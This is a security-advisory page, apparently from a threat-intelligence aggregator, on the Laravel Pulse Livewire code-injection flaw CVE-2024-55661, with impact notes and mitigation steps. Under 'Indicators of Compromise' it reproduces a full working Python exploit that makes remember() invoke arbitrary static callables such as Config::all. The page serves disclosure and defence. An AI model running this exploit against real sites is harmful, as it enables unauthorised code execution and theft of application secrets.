Laravel Pulse 1.3.1 - Arbitrary Code Injection
Laravel Pulse 1.3.1 - Arbitrary Code Injection
AI Analysis
Technical Summary
The security threat concerns an arbitrary code injection vulnerability identified as CVE-2024-55661 in Laravel Pulse versions prior to 1.3.1. Laravel Pulse is a PHP-based web application package built on the Laravel framework, utilizing Laravel Livewire for reactive components. The vulnerability arises from improper handling in the `remember()` method within the `RemembersQueries` trait. This method can be manipulated by an attacker crafting a malicious Livewire request that invokes arbitrary callable methods. This flaw enables attackers to execute arbitrary PHP code remotely without authentication, provided they can send specially crafted HTTP POST requests to Livewire endpoints. The exploit leverages the Livewire component's ability to call methods dynamically, bypassing intended restrictions. The provided exploit code, written in Python 3, demonstrates how to send such a payload to a vulnerable Laravel Pulse instance. It constructs a JSON request targeting the Livewire message endpoint, specifying the component, method, and parameters to trigger the `remember()` method with attacker-controlled inputs. Successful exploitation can lead to remote code execution (RCE) or sensitive data leakage if unsafe classes or methods are exposed within the application context. The vulnerability affects Laravel Pulse versions earlier than 1.3.1, with no patch links currently provided. No authentication or user interaction is required to exploit this vulnerability, making it a critical risk vector for exposed web applications using vulnerable Laravel Pulse versions. The exploit targets the Livewire message endpoint, typically accessible on web servers hosting Laravel Pulse applications, and can be executed remotely over HTTP/HTTPS.
Potential Impact
For European organizations, this vulnerability poses a significant risk to web applications built using Laravel Pulse prior to version 1.3.1. Exploitation can result in full remote code execution, allowing attackers to execute arbitrary commands, deploy malware, exfiltrate sensitive data, or pivot within the network. This can lead to data breaches, service disruption, and reputational damage. Given Laravel's popularity in Europe, especially among SMEs and startups, organizations using Laravel Pulse components in their web infrastructure are at risk. The vulnerability's ease of exploitation without authentication increases the likelihood of automated scanning and exploitation attempts. Critical sectors such as finance, healthcare, and government institutions relying on Laravel-based applications could face severe operational and compliance impacts, including GDPR violations due to data exposure. Additionally, the exploit could be used to establish persistent backdoors or launch further attacks within corporate networks. The absence of known exploits in the wild currently suggests a window for proactive mitigation before widespread exploitation occurs.
Mitigation Recommendations
1. Immediate upgrade to Laravel Pulse version 1.3.1 or later where the vulnerability is patched. 2. If upgrading is not immediately feasible, restrict access to Livewire endpoints via network controls such as web application firewalls (WAFs) or IP whitelisting to limit exposure. 3. Implement strict input validation and sanitization on Livewire components to prevent invocation of unsafe methods. 4. Employ runtime application self-protection (RASP) tools to detect and block suspicious dynamic method calls. 5. Monitor web server logs and application logs for unusual POST requests to Livewire endpoints, especially those invoking the `remember()` method. 6. Use Content Security Policy (CSP) headers and disable unnecessary Livewire features if possible. 7. Conduct thorough code reviews to ensure no unsafe classes or methods are exposed to Livewire components. 8. Deploy intrusion detection systems (IDS) tuned to detect exploitation patterns of this vulnerability. 9. Educate development teams about secure usage of dynamic method calls in Laravel Livewire components. 10. Regularly scan web applications with vulnerability scanners that include checks for Laravel Pulse vulnerabilities.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden, Belgium, Austria
Indicators of Compromise
- exploit-code: #!/usr/bin/env python3 # Exploit Title: Laravel Pulse 1.3.1 - Arbitrary Code Injection # Author: Mohammed Idrees Banyamer (@banyamer_security) # GitHub: https://github.com/mbanyamer # Date: 2025-06-06 # Tested on: Laravel Pulse v1.2.0 / Ubuntu 22.04 / Apache2 # CVE: CVE-2024-55661 # Type: Remote Code Execution (via Arbitrary Code Injection) # Platform: PHP (Laravel Livewire) # Author Country: Jordan # Description: # A vulnerability in Laravel Pulse (< 1.3.1) allows arbitrary code injection via # the `remember()` method in the `RemembersQueries` trait. The attacker can craft # a Livewire request to invoke arbitrary callables, enabling data exfiltration or # remote execution if unsafe classes are exposed. """ Laravel Pulse < 1.3.1 - Arbitrary Code Injection Exploit (CVE-2024-55661) Author: Mohammed Idrees Banyamer | PoC This tool exploits the vulnerability in the `remember()` method in vulnerable versions of laravel/pulse to trigger arbitrary code execution or sensitive data leakage via Livewire. """ import argparse import requests import json import sys from rich import print from rich.console import Console console = Console() class LaravelPulseExploit: def __init__(self, url, component, method, csrf=None, key='exploit', component_id='abcde'): self.url = url.rstrip('/') self.component = component self.method = method self.csrf = csrf self.key = key self.component_id = component_id self.headers = { "Content-Type": "application/json", "X-Livewire": "true", "Accept": "application/json" } if csrf: self.headers["X-CSRF-TOKEN"] = csrf def build_payload(self): return { "type": "callMethod", "method": "remember", "params": [self.method, self.key], "id": self.component_id, "name": self.component } def send(self): full_url = f"{self.url}/livewire/message/{self.component}" payload = self.build_payload() console.print(f"[bold cyan][*] Sending exploit to:[/bold cyan] {full_url}") try: response = requests.post(full_url, headers=self.headers, json=payload, timeout=10) except requests.exceptions.RequestException as e: console.print(f"[bold red][-] Request failed:[/bold red] {str(e)}") sys.exit(1) self.display_response(response) def display_response(self, response): console.print(f"\n[bold green][+] Status Code:[/bold green] {response.status_code}") if response.status_code == 200: try: data = response.json() pretty_data = json.dumps(data, indent=4, ensure_ascii=False) console.print(f"[bold yellow]\n[+] Response JSON:[/bold yellow]\n{pretty_data}") except json.JSONDecodeError: console.print(f"[bold red][-] Failed to decode JSON:[/bold red]\n{response.text}") else: console.print(f"[bold red][-] Unexpected response:[/bold red] {response.text}") def parse_arguments(): parser = argparse.ArgumentParser( description="Exploit Laravel Pulse (<1.3.1) Arbitrary Code Injection (CVE-2024-55661)" ) parser.add_argument("-u", "--url", required=True, help="Base URL of the Laravel app (e.g. http://example.com)") parser.add_argument("-c", "--component", required=True, help="Livewire component name (e.g. ConfigComponent)") parser.add_argument("-m", "--method", required=True, help="Static method to call (e.g. \\Illuminate\\Support\\Facades\\Config::all)") parser.add_argument("-k", "--key", default="exploit", help="Cache key (default: exploit)") parser.add_argument("--csrf", help="Optional CSRF token header") parser.add_argument("--id", default="abcde", help="Component ID (default: abcde)") return parser.parse_args() def banner(): console.print(""" [bold red] ____ _ | __ ) __ _ _ __ _ _ / \ _ __ ___ ___ _ __ | _ \ / _` | '_ \| | | | / _ \ | '_ ` _ \ / _ \ '__| | |_) | (_| | | | | |_| |/ ___ \| | | | | | __/ | |____/ \__,_|_| |_|\__, /_/ \_\_| |_| |_|\___|_| |___/ [/bold red] [bold white]Laravel Pulse < 1.3.1 Arbitrary Code Injection (CVE-2024-55661)[/bold white] [blue]Author:[/blue] Mohammed Idrees Banyamer | [green]Poc[/green] """) if __name__ == "__main__": banner() args = parse_arguments() exploit = LaravelPulseExploit( url=args.url, component=args.component, method=args.method, csrf=args.csrf, key=args.key, component_id=args.id ) exploit.send()
Laravel Pulse 1.3.1 - Arbitrary Code Injection
Description
Laravel Pulse 1.3.1 - Arbitrary Code Injection
AI-Powered Analysis
Technical Analysis
The security threat concerns an arbitrary code injection vulnerability identified as CVE-2024-55661 in Laravel Pulse versions prior to 1.3.1. Laravel Pulse is a PHP-based web application package built on the Laravel framework, utilizing Laravel Livewire for reactive components. The vulnerability arises from improper handling in the `remember()` method within the `RemembersQueries` trait. This method can be manipulated by an attacker crafting a malicious Livewire request that invokes arbitrary callable methods. This flaw enables attackers to execute arbitrary PHP code remotely without authentication, provided they can send specially crafted HTTP POST requests to Livewire endpoints. The exploit leverages the Livewire component's ability to call methods dynamically, bypassing intended restrictions. The provided exploit code, written in Python 3, demonstrates how to send such a payload to a vulnerable Laravel Pulse instance. It constructs a JSON request targeting the Livewire message endpoint, specifying the component, method, and parameters to trigger the `remember()` method with attacker-controlled inputs. Successful exploitation can lead to remote code execution (RCE) or sensitive data leakage if unsafe classes or methods are exposed within the application context. The vulnerability affects Laravel Pulse versions earlier than 1.3.1, with no patch links currently provided. No authentication or user interaction is required to exploit this vulnerability, making it a critical risk vector for exposed web applications using vulnerable Laravel Pulse versions. The exploit targets the Livewire message endpoint, typically accessible on web servers hosting Laravel Pulse applications, and can be executed remotely over HTTP/HTTPS.
Potential Impact
For European organizations, this vulnerability poses a significant risk to web applications built using Laravel Pulse prior to version 1.3.1. Exploitation can result in full remote code execution, allowing attackers to execute arbitrary commands, deploy malware, exfiltrate sensitive data, or pivot within the network. This can lead to data breaches, service disruption, and reputational damage. Given Laravel's popularity in Europe, especially among SMEs and startups, organizations using Laravel Pulse components in their web infrastructure are at risk. The vulnerability's ease of exploitation without authentication increases the likelihood of automated scanning and exploitation attempts. Critical sectors such as finance, healthcare, and government institutions relying on Laravel-based applications could face severe operational and compliance impacts, including GDPR violations due to data exposure. Additionally, the exploit could be used to establish persistent backdoors or launch further attacks within corporate networks. The absence of known exploits in the wild currently suggests a window for proactive mitigation before widespread exploitation occurs.
Mitigation Recommendations
1. Immediate upgrade to Laravel Pulse version 1.3.1 or later where the vulnerability is patched. 2. If upgrading is not immediately feasible, restrict access to Livewire endpoints via network controls such as web application firewalls (WAFs) or IP whitelisting to limit exposure. 3. Implement strict input validation and sanitization on Livewire components to prevent invocation of unsafe methods. 4. Employ runtime application self-protection (RASP) tools to detect and block suspicious dynamic method calls. 5. Monitor web server logs and application logs for unusual POST requests to Livewire endpoints, especially those invoking the `remember()` method. 6. Use Content Security Policy (CSP) headers and disable unnecessary Livewire features if possible. 7. Conduct thorough code reviews to ensure no unsafe classes or methods are exposed to Livewire components. 8. Deploy intrusion detection systems (IDS) tuned to detect exploitation patterns of this vulnerability. 9. Educate development teams about secure usage of dynamic method calls in Laravel Livewire components. 10. Regularly scan web applications with vulnerability scanners that include checks for Laravel Pulse vulnerabilities.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52319
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Laravel Pulse 1.3.1 - Arbitrary Code Injection
#!/usr/bin/env python3 # Exploit Title: Laravel Pulse 1.3.1 - Arbitrary Code Injection # Author: Mohammed Idrees Banyamer (@banyamer_security) # GitHub: https://github.com/mbanyamer # Date: 2025-06-06 # Tested on: Laravel Pulse v1.2.0 / Ubuntu 22.04 / Apache2 # CVE: CVE-2024-55661 # Type: Remote Code Execution (via Arbitrary Code Injection) # Platform: PHP (Laravel Livewire) # Author Country: Jordan # Description: # A vulnerability in Laravel Pulse (< 1.3.1) allows arbitrary code injection vi... (4336 more characters)
Threat ID: 68489c7b82cbcead92620aa2
Added to database: 6/10/2025, 8:58:35 PM
Last enriched: 6/11/2025, 8:08:31 AM
Last updated: 8/19/2025, 8:28:55 PM
Views: 34
Related Threats
After SharePoint attacks, Microsoft stops sharing PoC exploit code with China
HighU.S. CISA adds Apple iOS, iPadOS, and macOS flaw to its Known Exploited Vulnerabilities catalog
MediumPre-Auth Exploit Chains Found in Commvault Could Enable Remote Code Execution Attacks
HighAI can be used to create working exploits for published CVEs in a few minutes and for a few dollars
MediumRussian State Hackers Exploit 7-Year-Old Cisco Router Vulnerability
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.